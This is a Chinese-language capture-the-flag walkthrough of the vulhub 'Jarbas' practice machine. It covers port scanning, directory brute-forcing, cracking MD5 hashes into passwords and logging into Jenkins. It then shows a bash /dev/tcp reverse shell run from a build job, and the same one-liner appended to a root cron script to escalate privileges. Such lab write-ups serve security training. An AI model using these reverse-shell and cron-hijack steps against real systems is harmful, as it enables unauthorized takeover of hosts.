vulhub-Jarbas(易)

news2024/12/24 8:32:34

打靶练习Jarbas

  • 0x00 部署
  • 0x01 信息收集:端口扫描、服务发现
  • 0x02 路径爬取
  • 0x03 反弹shell
  • 0x04 内网信息收集
  • 0x05 crontab定时任务提权
  • 0x06 总结

0x00 部署

靶机:下载地址
宿主机:kali2021版本

0x01 信息收集:端口扫描、服务发现

sudo arp-scan -l #探测存活ip
sudo nmap -sS -T4 -A -p- ip #对可疑ip进行端口的详细扫描
sudo nmap --script=vuln -p ip#对端口可能存在的漏洞进行检测

在这里插入图片描述

端口版本可能存在漏洞
22OpenSSH7.4
80Apache httpd 2.4.6/php 5.4.16http-Trace
3306mysqlMariaDB未认证
8080Jetty9.4.z-SNAPSHOTrobots

在这里插入图片描述
初步判定应该存在路径隐藏。

查看robots.txt文件看是否可以暴漏一些隐藏文件目录:
在这里插入图片描述
没有什么可以利用的。

0x02 路径爬取

对80端口进行进一步的爬取
使用gobuster/dirsearch工具进行路径爬取:
$ dirsearch -u ip地址 -w /usr/share/seclists/Discovery/Web-Cotent/common.txt
$ gobuster dir -r -u ip地址 -x txt,html,php -w /usr/share/seclists/Discovery/Web-Cotent/common.txt

在这里插入图片描述

在这里插入图片描述
对比出来的目录:

访问access.html页面,以安全加密方式,猜测为md5,可以用hash-ident验证一下:
在这里插入图片描述
在这里插入图片描述

解密工具: MD5在线解密

在这里插入图片描述

tiago:5978a63b4654c73c60fa24f836386d87---italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5---marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98---vipsu

使用tiago和trindade对应密码访问:
在这里插入图片描述
使用eder:vipsu账户登录:
在这里插入图片描述
依次检查,在new item页面新建一个任务:
在这里插入图片描述
命名为test1,选择项目类型并确认即创立完成:
在这里插入图片描述
在创建页面找到这里可以执行shell,这就可以利用反弹shell来进行提权操作。

0x03 反弹shell

写入脚本:

/bin/bash -i >& /dev/tcp/攻击机ip/4444 0>&1
bash -i 产生一个可交互的shell
dev/tcp/ip/port 特殊设备文件,实际这个文件并不存在,只是bash用来实现网络请求的一个接口,打开这个文件相当于发出一个socket请求调用并建立一个socket连接,

应用并保存,在kali上对4444端口进行侦听nc -lvp 4444,对写好反弹shell的任务进行立即构建:
在这里插入图片描述
在这里插入图片描述
在kali端收到传过来的shell,对当前账户的权限进行检查。

0x04 内网信息收集

这里可以利用应急响应的对应流程检查,来发现可以利用的漏洞。

查看到当前任务计划,发现有一个root用户的.sh文件
在这里插入图片描述
查看其内容:
在这里插入图片描述

0x05 crontab定时任务提权

该定时任务其含义是每五分钟执行.sh文件删除日志的脚本,并将输出内容放进/dev/null(垃圾桶)中。
利用思路,可以在这个文件内写入反弹shell,打开后执行root权限。

echo “/bin/bash -i>& /dev/tcp/ip/port 0>&1" >> /etc/script/CleanScript.sh

再重新进行侦听,因为是定时任务所以这里侦听到需要五分钟。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功提取

0x06 总结

jarbas靶场很简单,可以用来熟悉打靶场的流程,同时掌握反弹shell的使用。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/591742.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

《计算机组成原理》唐朔飞 第9章 控制单元的功能 - 学习笔记

写在前面的话:此系列文章为笔者学习计算机组成原理时的个人笔记,分享出来与大家学习交流。使用教材为唐朔飞第3版,笔记目录大体与教材相同。 网课 计算机组成原理(哈工大刘宏伟)135讲(全)高清_…

git (本地仓库)和(远程仓库)之间的代码推送:013

这里先说明一下循序: 1. 创建(远程仓库)和(本地仓库) 2. 创建(远程仓库)和(本地仓库)之间的链接 3. 将(本地仓库)的代码推通过命令送到(远程仓库);将(本地仓库)的代码通过(TortoiseGit小乌龟)推送到(远程仓库) 1. 创建(远程仓库)和(本地仓库)&#xff0c…

PHP异步:在PHP中使用 fsockopen curl 实现类似异步处理的功能

PHP从主流来看,是一门面向过程的语言,它的最大缺点就是无法实现多线程管理,其程序的执行都是从头到尾,按照逻辑一路执行下来,不可能出现分支,这一点是限制php在主流程序语言中往更高级的语言发展的原因之一…

C++实现sqlite单表增删改查的详细步骤

1.环境准备 coding之前需要先安装好C的集成开发环境, 我这里选择的是Visual Studio 2022,本来想使用CLion的, 但是破解太麻烦,懒得整了。 Visual Studio 2022 2.项目创建及编码 启动visual studio, 点击创建项目,选…

《MYSQL必知必会》读书笔记1

目录 行 主键 MYSQL工具 使用MYSQL 连接 检索数据 检索(SELECT) 限制结果(LIMIT) 排序检索(ORDER BY) 过滤数据(WHERE) 过滤数据(AND、OR) 通配符…

软件测试总结

软件生命周期(SDLC)的六个阶段 1、问题的定义及规划 此阶段是软件开发方与需求方共同讨论,主要确定软件的开发目标及其可行性。 2、需求分析 在确定软件开发可行的情况下,对软件需要实现的各个功能进行详细分析。需求分析阶段是一个很重要…

ML | 6 支持向量机

ML | 6 支持向量机 文章目录 ML | 6 支持向量机SVM介绍线性不可分数据线性可分数据 寻找最大间隔分类器求解的优化问题 SMO高效优化算法简化版SMO处理小规模数据集伪代码程序清单 完整Platt SMO 算法加速优化完整 Platt SMO的支持函数完整Platt SMO算法中的优化例程完整Platt S…

记录--Vue3自定义一个Hooks,实现一键换肤

这里给大家分享我在网上总结出来的一些知识,希望对大家有所帮助 核心 使用CSS变量, 准备两套CSS颜色, 一套是在 light模式下的颜色,一套是在dark模式下的颜色dark模式下的 CSS 权重要比 light 模式下的权重高, 不然当我们给html添加自定义属性[data-themedark]的时候…

CVPR 2023 | 南大王利民团队提出LinK:用线性核实现3D激光雷达感知任务中的large kernel...

点击下方卡片,关注“CVer”公众号 AI/CV重磅干货,第一时间送达 点击进入—>【Transformer】微信交流群 【CVPR 2023】LinK:用线性核实现3D激光雷达感知任务中的large kernel 本文介绍我们媒体计算研究组(MCG)在3D激…

chatgpt赋能python:Python中的提取函数——数据清洗中必不可少的利器

Python中的提取函数——数据清洗中必不可少的利器 数据清洗是数据分析过程中不可或缺的一步,而Python中的提取函数则是数据清洗中必不可少的利器。本文将重点介绍一些Python中常用的提取函数,以帮助数据分析师更好地应对实际问题。 什么是提取函数&…

react antd Modal里Form设置值不起作用

问题描述: react antd Modal里Form设置值不起作用,即使用form的api。比如:编辑时带出原有的值。 造成的原因:一般设置值都是在声明周期里设置,比如:componentDidMounted里设置,hook则在useEff…

云网络安全与数据中心安全

近年来,许多云架构师宣称随着公共云的采用,网络安全性将消亡。然而,网络安全仍然是最大的安全市场之一,并且是每个主要云服务提供商 (CSP) 在过去几年中推出重要新产品的领域。 网络对安全仍然至关重要,即使在云中也是…

【软考系统规划与管理师笔记】第4篇 信息技术服务知识

目录 1 产品、服务和信息技术服务 1.1 产品 1.2 服务 1.3 信息技术服务 2运维、运营和经营 2.1运维 2.2运营 2.3经营 3 IT治理 4 IT服务管理 4.1传统管理方式 4.2体系化管理方式 5项目管理 6质量管理理论 6.1质量管理发展历史 6.2质量管理常见理论方法 6.3质…

【公网远程Jellyfin】——本地部署Jellyfin影音服务器

文章目录 1. 前言2. Jellyfin服务网站搭建2.1. Jellyfin下载和安装2.2. Jellyfin网页测试 3.本地网页发布3.1 cpolar的安装和注册3.2 Cpolar云端设置3.3 Cpolar本地设置 4.公网访问测试5. 结语 1. 前言 随着移动智能设备的普及,各种各样的使用需求也被开发出来&…

面向Java开发者的ChatGPT提示词工程(5)

GPT 的局限性 在探讨开发大型语言模型应用程序时,我们必须认识到 GPT 存在一些局限性。这些限制对于我们保持清醒的头脑至关重要。 尽管在 GP T的训练过程中融入了大量知识,但它并非能够完美地记住所见之物,并且对这些知识的边界了解有限。…

玩转用户旅程地图

图:史江鸿 从事需求分析和产品设计工作已经有几个年头了,我很享受这个职业。因为在这段职业历程中,我学到了很多有意思的方法和工具,用户旅程地图就是其中一个。 如今在国内外许多IT公司,用户旅程地图已经成为需求分析…

ElasticSearch安装部署

ElasticSearch安装部署 简介 全文搜索属于最常见的需求,开源的 Elasticsearch (以下简称 es)是目前全文搜索引擎的首选。 它可以快速地储存、搜索和分析海量数据。维基百科、Stack Overflow、Github 都采用它。 Elasticsearch简称es&…

C++【实现红黑树(核心插入)】

文章目录 一、红黑树概念介绍二、红黑树模拟实现(1)红黑树节点(2)红黑树插入分析(核心)(3)插入代码思路(如何快速写插入算法)(4)判断平衡函数(5)查找函数&…

01_java基础语法

1. Java概述 1.1 Java语言背景介绍(了解) 语言:人与人交流沟通的表达方式 计算机语言:人与计算机之间进行信息交流沟通的一种特殊语言 Java语言是美国Sun公司(Stanford University Network)在1995年推出的…

【软硬件测试】测试经验:软硬件结合测试要点

目录 一、应用行业 二、测试要点 三、硬件测试 (1)测试含义 (2)测试方法 (3)相关链接 四、结合测试 (1)测试含义 (2)测试工具 (3&am…